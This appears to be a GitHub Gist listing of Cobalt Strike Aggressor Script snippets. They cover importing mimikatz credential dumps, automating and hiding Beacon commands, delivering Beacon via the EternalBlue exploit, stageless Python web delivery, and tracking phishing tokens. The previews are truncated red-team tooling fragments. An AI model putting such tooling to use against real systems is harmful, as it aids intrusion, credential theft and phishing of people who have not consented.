Raphael Mudge rsmudge

  • Washington, DC
rsmudge / mkimport.cna
Created Jan 14, 2021
import creds from a file with mimikatz output.
# import mimikatz creds from a file.
# go to View -> Script Console
# load this script
# type importcreds /path/to/file.txt
sub process {
    if ($luser eq "(null)" || $luser eq "") {
        return;
    }
rsmudge / checkit.cna
Created Sep 18, 2020
Fire a beacon_revisited event when we get a checkin event that occurs some window of time (e.g., 60s here) after the last checkin event. Keep in mind checkin is only fired on task acknowledgement. If you set the window to 8 hours and don't interact with the Beacon for 8 hours, you'll fire revisited.
global('%checkins');

on beacon_checkin {
    local('$last');
    if ($1 in %checkins) {
        $last = %checkins[$1];
        # has it been 1m since the last task acknowledgement?
        if (($3 - $last) > 60000) {
rsmudge / search.cna
Last active Jun 24, 2021
Search scrollback for a Beacon (even the stuff that's cut off)
# search for and reproduce output that matches a specific regex.
alias search {
    local('$regex $regex2 $entry $event $bid $out $when');
    # take all of the args, without processing/parsing as normal.
    if (strlen($0) > 7) {
        $regex = substr($0, 7);
    }
    else {
        berror($1, "search [regex]");
rsmudge / callany.cna
Last active Jul 21, 2020
Create a hidden Beacon console and pass a command+args to it for execution.
import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;

# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
    local('$event');
    # we make the console a static var because each console we create subscribes to a bunch of stuff
    # and requires a manual step [normally performed by a Window close event] to clean up these things.
rsmudge / initial.cna
Created Feb 20, 2019
How to automate Beacon to execute a sequence of tasks with each checkin...
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
    # Tasks for first checkin
rsmudge / mouse.cna
Created Mar 21, 2018
How to add a popup handler to a Swing component in Aggressor Script/Sleep
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;

# safely add a listener to show a popup
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.
rsmudge / safedelete.cna
Created Sep 1, 2017
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");

popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");
rsmudge / eternalblue.cna
Last active Aug 26, 2021
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#

# target, listener, where to save .rc file
sub generate_rc_file {
    local('$target $listener $where $handle $shellcode');
    ($target, $listener, $where) = @_;
rsmudge / stagelesspython.cna
Created Apr 26, 2017
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
    local('%options $x86payload $x64payload $url $script');
    %options = $3;

    # generate our stageless x86 payload
    artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
    yield;
rsmudge / tokenToEmail.cna
Created Mar 31, 2017
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#

# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');